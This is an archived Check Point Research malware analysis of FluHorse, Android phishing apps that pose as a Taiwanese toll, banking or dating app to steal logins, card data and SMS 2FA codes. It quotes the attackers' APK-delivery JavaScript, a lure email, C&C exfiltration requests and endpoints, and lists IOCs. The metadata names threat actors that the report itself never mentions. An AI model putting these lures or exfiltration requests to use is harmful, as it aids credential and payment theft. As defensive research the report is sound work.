{ "id": "3da616d2-9c3f-4ae6-99d6-4381bbe2e409", "created_at": "2026-04-06T00:21:09.503497Z", "updated_at": "2026-04-10T03:31:13.612327Z", "deleted_at": null, "sha1_hash": "2c6c10bcefc593664e28b5363144ef7a6ea5c4a2", "title": "Eastern Asian Android Assault - FluHorse - Check Point Research", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 147163, "plain_text": "Eastern Asian Android Assault - FluHorse - Check Point Research\r\nBy ramanl\r\nPublished: 2023-05-04 · Archived: 2026-04-05 18:20:58 UTC\r\nResearch by: Alex Shamshur, Sam Handelman, Raman Ladutska, Ohad Mana\r\nIntroduction\r\nIn the latest research conducted by Check Point Research, we describe a newly discovered malware called\r\nFluHorse. The malware features several malicious Android applications that mimic legitimate applications, most\r\nof which have more than 1,000,000 installs. These malicious apps steal the victims’ credentials and Two-Factor\r\nAuthentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via\r\nemails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware\r\ncan remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.\r\nImage 1 – One of the malware samples, still not detected on VirusTotal (VT) after 3 months.\r\nCyber-crime operators often get creative in their aim of complicating the malware analysis. They can use tricks\r\nlike evasion techniques, obfuscation, and long delays before execution – all to sneak past virtual environments and\r\nconfound researchers. Usually, these tricks have custom implementation that require plenty of effort on their\r\ncreators’ behalf. Only in rare cases are malware samples hard to detect and analyze even when they are developed\r\nwith widely available technologies.\r\nQuite surprisingly, no custom implemented tricks are used inside FluHorse, as the malware authors relied solely\r\non open-source frameworks for the development process. Although some of the applications are created partly\r\nwith Kotlin, the malicious functionality is implemented with Flutter – and this is where we focused our technical\r\nefforts. Flutter is an open-source UI software development kit created by Google. It is used to develop cross-platform applications for various platforms, including Android and iOS for mobile devices, with a single\r\ncodebase. What makes Flutter an appealing choice for malware developers is the use of a custom virtual\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 1 of 23\n\nmachine (VM) to support different platforms and its ease of use for creation of GUI elements. In addition,\r\nanalyzing such applications is complicated, due to the custom VM, which makes this framework a perfect solution\r\nfor Android phishing attacks, as it turned out to be.\r\nIn the article below, we describe different targeted markets in several countries and compare phishing applications\r\nwith the legitimate ones – differences are pretty hard to spot at first glance). We note the available tools for\r\nFlutter-application analysis while also providing the enhancements that resulted in our open-source contribution:\r\nhttps://github.com/Guardsquare/flutter-re-demo/pull/4. We go through all the pitfalls encountered during our\r\nresearch and provide solutions on how to bypass them. Finally, we give an overview of Command-and-Control\r\n(C\u0026C) communication of the malware as well as dive deeply into the details of the network infrastructure\r\nanalysis.\r\nMimicked applications\r\nThe malware operators made an eclectic selection of targeted sectors for particular countries, using one mimicked\r\napplication in each country. One of these mimicked applications is ETC application which is used for toll\r\ncollection in Taiwan. This application has more than 1,000,000 installs in Google Play. The company behind ETC\r\nis trusted and have good reputation, which makes such an application very appealing to the attackers as it is sure\r\nto attract solvent customers:\r\nFar Eastern Electronic Toll Collection Co., Ltd (FETC) company in Taiwan – The developer of the ETC APK\r\nhas approximately 16 million transactions per day and more than 6 million users according to the company’s\r\nwebsite.\r\nMore cases include a mimicked major transportation application and a major banking application – we do not\r\ndescribe them thoroughly in this article.\r\nAlthough the spheres are different, the malware operators made an effort to carefully mimic all the key interface\r\ndetails to avoid raising any suspicions. We meticulously go through the details of GUI in different applications\r\nlater in the report, in the chapter “Phishing scheme ”.\r\nThere are also some malicious applications that are connected to the Dating sphere, but we did not find any\r\nmatching applications that the malware attempts to mimic. In this scenario, the scheme is a bit different: the\r\nmalware serves as a browser to the phishing site where the victim is supposed to enter the sensitive data. These\r\napplications are aimed at Chinese-speaking users.\r\nImage 2 – An icon of Dating malicious application (translated as “Night Love”).\r\nPhishing scheme\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 2 of 23\n\nLet’s take a look at how the phishing scheme is implemented in different variants of the applications. It’s\r\ninteresting to note that malicious applications do not contain anything except for several replicas of windows to\r\nprovide a victim with input possibilities. No additional functions or checks were added. This deliberate simplicity\r\nleads us to the conclusion that the malware operators did not put much effort into the programming part of their\r\ncreation… Or they could have made this decision on purpose to further reduce the chances of being detected by\r\nsecurity solutions.\r\nWhatever their intention was, the scheme works pretty well. After the victim enters sensitive data, it is exfiltrated\r\nto the C\u0026C server. Meanwhile, the malware asks the victim to wait for several minutes while “the data is being\r\nprocessed.” At this step, the SMS interception feature takes the stage and redirects all the incoming SMS traffic to\r\nthe malicious server. If the malware actors enter stolen credentials or credit card data and then are asked to input\r\nTwo Factor Authentication (2FA) code, this is intercepted as well. The diagram below summarizes the phishing\r\nscheme in a graphical form:\r\nImage 3 – How the malware performs phishing attacks.\r\nPlease note that depending on the type of malicious application (targeting Electronic Toll, Banking or Dating\r\nusers), credentials or credit card numbers may not be required.\r\nInfection chain and targets\r\nBefore the malicious applications are installed on the victims’ devices, they must first be delivered. This is where\r\nemail lures come in handy. We traced infection chains for different types of malicious applications and discovered\r\nmultiple high-profile entities among the recipient of these emails, including employees of the government sector\r\nand large industrial companies.\r\nEmail lures are a good use of social engineering and are aligned with the alleged purpose of subsequently installed\r\nmalicious APK: paying tolls.\r\nThis is an example of an email lure with the fetc.net.tw-notice@twfetc.com sender address:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 3 of 23\n\nImage 4 – Example of an email sent by malware operators to government recipient.\r\nThis is the email translation:\r\nDear eTag user\r\nYour one-time toll of 128 yuan expires on January 10, 2023. To avoid\r\na fine of 300 yuan per transaction, please use your mobile phone to click\r\nand download the Yuantong Electric Collection App as soon as possible\r\nPay online. https://www.fetc-net[.]com\r\nFar Eastern Electronic Toll Collection Co,Ltd.All Right Reserved.\r\nYuantong Electric has trademarks and copyrights, please do not copy or\r\nreprint without authorization.\r\nIf you have any questions, please call Yuantong Customer Service Line 02-77161998.\r\nThanks.\r\nThe malicious fetc-net[.]com domain used by the malware operators is very similar to  fetc.net.tw, which is the\r\nofficial site of FETC company.\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 4 of 23\n\nOn this malicious website, the malware actors added an additional protection layer to ensure that only the victims\r\nare able to download the APK: it is downloaded in the case if a target’s user agent matches the expected one. This\r\ncheck is performed via a client-side JavaScript:\r\nvar user = navigator.userAgent;\r\nif (user.match(/(iphone os)/i)) {\r\nelse if (user.match(/ipad/i)) {\r\nelse if (user.match(/(midp|ucweb|android|windows ce|windows mobile)/i)) {\r\nwindow.location.href = \"fetc.apk\";\r\nvar user = navigator.userAgent; if (user.match(/(iphone os)/i)) { console.log(\"isphone\");} else if\r\n(user.match(/ipad/i)) { console.log(\"isipad\");} else if (user.match(/(midp|ucweb|android|windows ce|windows\r\nmobile)/i)) { window.location.href = \"fetc.apk\"; };\r\nvar user = navigator.userAgent;\r\nif (user.match(/(iphone os)/i)) {\r\nconsole.log(\"isphone\");}\r\nelse if (user.match(/ipad/i)) {\r\nconsole.log(\"isipad\");}\r\nelse if (user.match(/(midp|ucweb|android|windows ce|windows mobile)/i)) {\r\nwindow.location.href = \"fetc.apk\";\r\n};\r\nAfter the malware is installed, it requires SMS permissions:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 5 of 23\n\nImage 5 – ETC APK makes a request for SMS permissions.\r\nThe permissions obtained at this step will come into play just after the victim enters the sensitive data. And this\r\nbrings us straight to the next chapter where the attack scheme is described.\r\nMalicious applications: step-by-step GUI analysis\r\nLet’s take a more detailed look at a couple of malicious applications we encountered.\r\nMalicious Electronic Toll Collection APK\r\nThis application contains only 3 windows:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 6 of 23\n\nImage 6 – Windows shown in sequence by the malicious ETC APK.\r\nThe first window asks for user credentials, and the second one for the credit card data. All this sensitive data is\r\nexfiltrated to the malicious C\u0026C server. Next, the third window asks the user to wait for 10 minutes because the\r\n“system is busy.” The hope is that the user will close the application, or at least not suspect anything wrong for a\r\nreasonable period of time. While the user is lulled into a false sense of security by the “system busy” message, the\r\nmalware operators perform all their required actions, i.e., intercept all the incoming SMS with 2FA codes and\r\nmake use of the stolen data.\r\nThe entire GUI of this decoy application looks like a pretty neat copy of the original ETC application for\r\ncollecting tolls. This is the visual comparison of the malicious and legitimate application entry windows:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 7 of 23\n\nImage 7 – Original entry window (left) and the malicious APK entry window (right).\r\nThe original application does not show any fields to log in or enter user credentials. Instead, there is a separate\r\nwindow for this purpose:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 8 of 23\n\nImage 8 – Original application log in form.\r\nMalicious Dating APK\r\nThe Dating application does not contain any windows. Instead, it effectively functions as a browser leading to the\r\nphishing dating site. However, the principle of stealing and processing the data remains the same.\r\nWe do not have screenshots of all the steps interacting with the victim, as at the time of writing this article the\r\nmalicious servers responsible for processing stolen data from this APK were not active. According to the code,\r\nonly credit card data is stolen, and no credentials are asked for.\r\nThis is how the entry to the dating site looks inside the application:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 9 of 23\n\nImage 9 – Window of the phishing dating site shown inside the APK.\r\nThe translation of the shown message follows:\r\nImage 10 – The translation of the message shown on the phishing site.\r\nTechnical details\r\nThe analysis of Flutter-based applications, compared to the analysis of pure Android applications, requires some\r\nintermediate steps to reach our goal.\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 10 of 23\n\nThere are already several good existing guidelines that we used as a basis for our technical analysis:\r\nReverse Engineering Flutter apps by tst.sh\r\nThe Current State \u0026 Future of Reversing Flutter Apps by Guardsquare\r\nWe introduced some technical and quality-of-life improvements to the open-source tools used in those\r\npublications.\r\nDigging deep\r\nAs we mentioned in the introduction, Flutter uses a custom virtual environment to support multi-platform\r\ndevelopment with a single code base. A specific programming language, called Dart, is used for the development.\r\nAnalyzing the Flutter platform code gets a bit easier as it is available as an open-source project, but can still be a\r\ntedious process.\r\nImage 11 – Dart presentation in the Flutter Github page.\r\nLet’s take a look at some of the complications we encountered when dealing with an ad-hoc realm of Flutter\r\nruntime. We dissected an APK with the hash\r\n2811f0426f23a7a3b6a8d8bb7e1bcd79e495026f4dcdc1c2fd218097c98de684.\r\nFlutter runtime for ARM uses its own stack pointer register (R15) instead of the built-in stack pointer (SP). Which\r\nregister is used as a stack pointer makes no difference in code execution or in the reverse-engineering process.\r\nHowever, it makes a big difference for the decompiler. Because of a non-standard register usage, a wrong and ugly\r\npseudocode is generated.\r\nA good way to start the malware analysis is to determine the protocol of the communication with the C\u0026C\r\nservers. This can say a lot about the malicious functionality. There is one string inside that corresponds to the site\r\nwe saw in the phishing email:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 11 of 23\n\nImage 12 – Address of the C\u0026C server among the strings inside the malicious APK.\r\nHowever, when we try to find some references to this string, the analysis fails:\r\nImage 13 – Absence of references to the C\u0026C server string in IDA.\r\nOur goal is to create a reference to this string to locate the code where the C\u0026C communication is\r\nperformed.\r\nThe articles we mentioned earlier introduce some nice open-source tools to deal with Flutter applications: flutter-re-demo and reFlutter. Their main idea is to use runtime snapshots to create Dart objects and find references to\r\nthem. The main purpose of reFlutter is to gather the functions’ names while flutter-re-demo allows us to work\r\nwith the memory dumps collected during the application execution.\r\nHowever, in addition to memory snapshots, some more runtime information is required. Flutter runtime uses a\r\nheap to create objects and stores the pointer to created objects in a special area called the Object Pool. The pointer\r\nto this pool is passed to the method in a register X27. We need to find the location of the Object Pool.\r\nflutter-re-demo uses Frida to collect memory dumps and to get the Object Pool address. If we run our APK with\r\nthe dump_flutter_memory.js script available in the flutter-re-demo repository, we see the desired address:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 12 of 23\n\nImage 14 – Frida script output with the required addresses.\r\nNow we have all the required elements to start a productive reverse engineering.\r\nAfter loading the dumps with map_dart_vm_memory.py and running the script create_dart_objects.py, we can\r\nnow see at least some of the objects:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 13 of 23\n\nImage 15 – Objects created by the script.\r\nWe have to mention here our first addition to the original flutter-re-demo scripts as a part of the open-source\r\ncontribution.\r\nThere is a script called create_dart_objects.py which intends to create Dart objects. The script works by walking\r\nover Object Pool, parsing records and creating objects. There are a bunch of objects that the script has no\r\ninformation about – for them the script creates the following structures which describe object format:\r\nuint8_t is_canonical_and_gc;\r\nstruct DartUnkObjNNN { uint8_t is_canonical_and_gc; uint8_t size_tag; uint16_t cid; uint32_t padding; uint64_t\r\nunk; }\r\nstruct DartUnkObjNNN {\r\nuint8_t is_canonical_and_gc;\r\nuint8_t size_tag;\r\nuint16_t cid;\r\nuint32_t padding;\r\nuint64_t unk;\r\n}\r\nNNN here is replaced by the “class id” number, like this:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 14 of 23\n\nImage 16 – Struct, created by create_dart_objects.py.\r\nDuring the Flutter application reverse-engineering, we noticed that the last field (unk) is frequently used as a\r\npointer. We considered converting this field from a simple QWORD to OFFSET QWORD. This could give us\r\nsome false positives but could also be very helpful in creating references. We therefore decided to change the field\r\ntype for unkin structures created by the script. This is our change to the original script:\r\nImage 17 – Our changes to the dart_obj_create.py script.\r\nThe repository we mentioned contains a script for creating references to Dart objects:\r\nadd_xref_to_dart_objects.py. When you run it, the script goes through the code and creates references to the Dart\r\nobjects created by create_dart_objects.py scripts. After this process, we still have only one reference to the string\r\nwe are interested in, namely the reference from Object Pool:\r\nImage 18 – There are no references to the C\u0026C server URL.\r\nOur first thought was maybe there are no cross-references at all? But no, there are several cross-references\r\npresent, e.g., this object has references:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 15 of 23\n\nImage 19 – A couple of references from functions to objects.\r\nThis is the object which is referenced from the function:\r\nImage 20 – How the reference looks in the function code.\r\nLet’s investigate why we do not see our reference. Walking through the code of add_xref_to_dart_objects.py\r\nbrings us to the file dart_obj_xref.py. This file also walks through the code, tries to extract references to data based\r\non the register X27, counts offsets of these references, and finally creates IDA references. Analysis of the code\r\nshows that the original script supports two variants of ARM code that access the object:\r\n1:\r\nADD X17, X27, #0x18,LSL#12\r\nLDR X17, [X17,#0xA58]\r\n2:\r\nLDR X24, [X27,#0x20]\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 16 of 23\n\nDoes the code use some other instructions to reference the register X27? Let’s check. For convenience, let’s\r\nmodify the script and add a comment to each instruction processed with X27:\r\nImage 21 – dart_obj_xref.py modification.\r\nWe can then inspect a disassembler listing for constructions processed with X27, which have no comment\r\nreference to Dart object attached. We can partially automate these actions by generating a listing file with IDA and\r\ngreping it with grep utility like this:\r\ngrep \"X27\" libapp.lst | grep --invert-match \"reference to Dart object\"\r\nFirst, grep finds all strings with X27. Then all those strings fall to the second grep command to print only those\r\nstrings which contain no reference to Dart object. Therefore, we see only unsupported X27 references.\r\nWhen we detect an unsupported X27 construction, we add the code to support it in the script. After several\r\niterations, we finally get our references to the C\u0026C address string:\r\nImage 22 – References to the C\u0026C address string.\r\nLet’s inspect these functions starting with sub_70FD611C0C. A brief overview shows that this function intends to\r\ndo something with the HTTP POST method with the path “/addcontent3” when communicating with the C\u0026C\r\nserver:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 17 of 23\n\nImage 23 – Pseudo-code of the sub_70FD611C0C function.\r\nThere is also a reference to this function from another Dart object:\r\nImage 24 – Reference to a Dart object.\r\nAs we go through the references, we finally come to the function with the following code:\r\nImage 25 – Code responsible for listening to all the incoming SMS.\r\nThis function installs a listener for all incoming SMS messages.\r\nTo be absolutely sure we made a correct static analysis, we checked this function on a real device in runtime.\r\nIndeed, we caught a POST request to the C\u0026C server.\r\nThis is an example of C\u0026C request after the device received an SMS with the text “Fdsa”:\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 18 of 23\n\nPOST /addcontent3\r\nuser-agent: Dart/2.16 (dart:io)\r\ncontent-type: application/x-www-form-urlencoded; charset=utf-8\r\naccept-encoding: gzip\r\ncontent-length: 12\r\nBody: ids=\u0026c4=Fdsa\r\nTherefore, the function sub_70FD611C0C is used for leaking SMS messages to the C\u0026C server.\r\nThe functions sub_70FD61EBC4 and sub_70FD61EECC look very similar to the already analyzed\r\nsub_70FD611C0C except for the kind of exfiltrated data and the server path. These functions use the paths\r\n“/addcontent” and “/addcontent2”, respectively, and are used to exfiltrate the victim’s credentials and pay card\r\ninformation.\r\nThere are no traces of server communication in DEX code, so we can assume all communication is located in the\r\nFlutter part of the application. After analyzing all the functions related to the C\u0026C server communication, we can\r\ndescribe the network protocol.\r\nC\u0026C communication\r\nC\u0026C protocol intends to only send data from the compromised device to the server. There are no commands to\r\nsend in the opposite direction i.e. from the server to the compromised device. HTTPS is used to transfer data, and\r\nthere are several endpoints used.\r\nThis is the description of every endpoint we encountered in the analyzed samples:\r\nEndpoint Description\r\nMethod\r\nUsed\r\nFields\r\n/addcontent Used to exfiltrate the victims’ credentials. POST\r\nс1 – user login\r\nс2 – user password\r\n \r\n/addcontent2\r\nUsed to exfiltrate credit card data to the\r\nserver.\r\nPOST\r\nids – always empty\r\nc3 – for card\r\nnumber\r\nc33 – for\r\nexpiration date\r\nc333 – for CVC\r\ncode\r\n/addcontent3\r\nUsed to exfiltrate SMS messages\r\nintercepted by the malicious application.\r\nPOST\r\nids – always empty\r\nc4 – for SMS\r\nmessage body  \r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 19 of 23\n\nWeb variants of decoys that are used for Dating malicious applications use a very similar protocol. This is an\r\nexample of exfiltrating credit card data:\r\nURL: https://jp.yelove.xyz/addcontent2\r\nMETHOD: POST\r\nBODY: {\"cardNumber\":\"1234253456345\",\"name\":\"sfsdfgfde dg sdg\",\"expiryDate\":\"11/27\",\"cvvCode\":\"150\"}\r\nThe only difference is the body format: the Web version uses JSON instead of the “name=value” format.\r\nContribution summary\r\nThis is a summary of our open-source contribution to the flutter-re-demo project:\r\n1. Added parsing of some previously unsupported constructions for accessing Dart objects.\r\n2. Added saving key information during dynamic analysis and using this information in IDA scripts.\r\n3. One field for the unknown Dart object struct is set to the offset so that it can bring more references to Dart\r\nobjects.\r\nConclusion\r\nIdealists invent new technologies hoping for the progress of humankind. Realists adapt these inventions to day-to-day needs. Evil minds abuse them in often unforeseen and unpredictable ways to make the most for themselves.\r\nThis timeless truth got an unexpected implementation in abusing modern development frameworks by Android\r\nmalicious developers. Such frameworks can be used as a double-edged sword as we described above. Malware\r\noperators pursued a direct approach to stealing victims’ sensitive data without distractions to other components.\r\nThe technical implementation of these malicious samples consists of several layers. As the functional part is\r\nrelatively simple, we can conclude that the malware developers did not put much effort into the programming,\r\ninstead relying on Flutter as a developing platform. The developers’ main focus is on the GUI. This approach\r\nallowed them to create dangerous and mostly undetected malicious applications. One of the benefits of using\r\nFlutter is that its hard-to-analyze nature renders many contemporary security solutions worthless.\r\nWe traced FluHorse activity back to May 2022. Our analysis shows that these campaigns remain an ongoing threat\r\nas new infrastructure nodes and malicious applications appear each month.\r\nAs the human factor remains an important factor in malware attacks, Check Point Research recommends the\r\nfollowing suggestions for mobile device users:\r\nDo not open links in the unexpected emails from unknown senders.\r\nInstall applications only from trusted and verified publishers.\r\nIf you see an application from a new publisher, search for analogs from a trusted one.\r\nCheck Point’s Harmony Mobile prevents malware from infiltrating mobile devices by detecting and blocking the\r\ndownload of malicious apps in real-time. Harmony Mobile’s unique network security infrastructure – On-device\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 20 of 23\n\nNetwork Protection – allows you to stay ahead of emerging threats by extending Check Point’s industry-leading\r\nnetwork security technologies to mobile devices.\r\nRelevant Check Point protections:\r\nStealer.Android.FluHorse.TC.*\r\nFluHorse.TC.*\r\nUpdates and edits\r\n2023-05-11 – Edited to remove sensitive research data\r\nIOCs\r\nSamples\r\nHash Description\r\n0a577ee60ca676e49add6f266a1ee8ba5434290fa8954cc35f87546046008388 Dating app\r\n2e18c919ad53a66622e404a96cbde15f237a7bfafed1c0896b6b7e289bc230d6\r\nMajor\r\nbanking app\r\n416e22d6b85d6633d1da000058efb3cd597b8b7df5d77a6c3456464d65a775b3 Toll app\r\n74008170fc5de4d40bcc97b8e2c6fbdb01889805c6ca456fd08134881cad0d2c Dating app\r\n8b591b5488dab8adb485ea55197148d6b39715da562537c7d8b1a79cd3639510\r\nMajor\r\nbanking app\r\n910707dd041c13f3379115bdf93bb4984ac20b9ecafd59f93e5089ab3a141e67 Toll app\r\n9220752302e2bca0002ea701c772b2f2306831711b1c323157ef2573f176821a\r\nMajor\r\nbanking app\r\nd78fa2c475ea08f90ef6b189d2a3fddc9ead86ae43df272e9083f92f7a47aabe\r\nMajor\r\nbanking app\r\nd8a777b050ba27eeb41c0035f3477882d7eafc56edfcbe1e8cef05a7e85c8b9e Delivery\r\nde86b0fbbd343f3fc5bb6c19a067a6f063b423132e19c6004c7b696ea1fe0c7d\r\nMajor\r\nbanking app\r\n2811f0426f23a7a3b6a8d8bb7e1bcd79e495026f4dcdc1c2fd218097c98de684 Toll app\r\n659f69d660179d0e8a5f4c2850c51a05529e0ef06ac739ca6f61fe470917ee96 Toll app\r\ne54a2581545477882a1b7c1f9cbb74fb2aa97fcf1ee8b097c8085302ed6fbf36 Major\r\ntransportation\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 21 of 23\n\nHash Description\r\napp\r\nDomains\r\nDomain Decoy relation\r\ninfo1.yelove.xyz Dating\r\njp.yelove.xyz Dating\r\nh5.yelove.xyz Dating\r\napi.vpbankem.com Bank\r\napi.fetctw.xyz Toll\r\napi.fetc-net.com Toll\r\napi.usadmin-3.top Toll and major transportation app\r\nwww.pcdstl.com Toll\r\nh5.spusp.xyz Dating\r\nOnline resources\r\nOpen-source projects\r\n1. https://github.com/Guardsquare/flutter-re-demo // flutter-re-demo – Open-source project for analysis of\r\nFlutter-based applications\r\n2. https://github.com/ptswarm/reFlutter // reFlutter – Open-source project for analysis of Flutter-based\r\napplications\r\n3. https://github.com/frida // Frida – Dynamic instrumentation toolkit for developers, reverse-engineers, and\r\nsecurity researchers\r\nTechnical analysis articles\r\n1. https://blog.tst.sh/reverse-engineering-flutter-apps-part-1 // Reverse engineering Flutter apps (Part 1)\r\n2. https://www.guardsquare.com/blog/current-state-and-future-of-reversing-flutter-apps // The Current State\r\n\u0026 Future of Reversing Flutter™ Apps\r\nContribution\r\nhttps://github.com/Guardsquare/flutter-re-demo/pull/4 // Our contribution to flutter-re-demo\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 22 of 23\n\nSource: https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nhttps://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/\r\nPage 23 of 23", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://research.checkpoint.com/2023/eastern-asian-android-assault-fluhorse/" ], "report_names": [ "eastern-asian-android-assault-fluhorse" ], "threat_actors": [ { "id": "75108fc1-7f6a-450e-b024-10284f3f62bb", "created_at": "2024-11-01T02:00:52.756877Z", "updated_at": "2026-04-10T02:00:05.273746Z", "deleted_at": null, "main_name": "Play", "aliases": null, "source_name": "MITRE:Play", "tools": [ "Nltest", "AdFind", "PsExec", "Wevtutil", "Cobalt Strike", "Playcrypt", "Mimikatz" ], "source_id": "MITRE", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434869, "ts_updated_at": 1775791873, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/2c6c10bcefc593664e28b5363144ef7a6ea5c4a2.pdf", "text": "https://archive.orkl.eu/2c6c10bcefc593664e28b5363144ef7a6ea5c4a2.txt", "img": "https://archive.orkl.eu/2c6c10bcefc593664e28b5363144ef7a6ea5c4a2.jpg" } }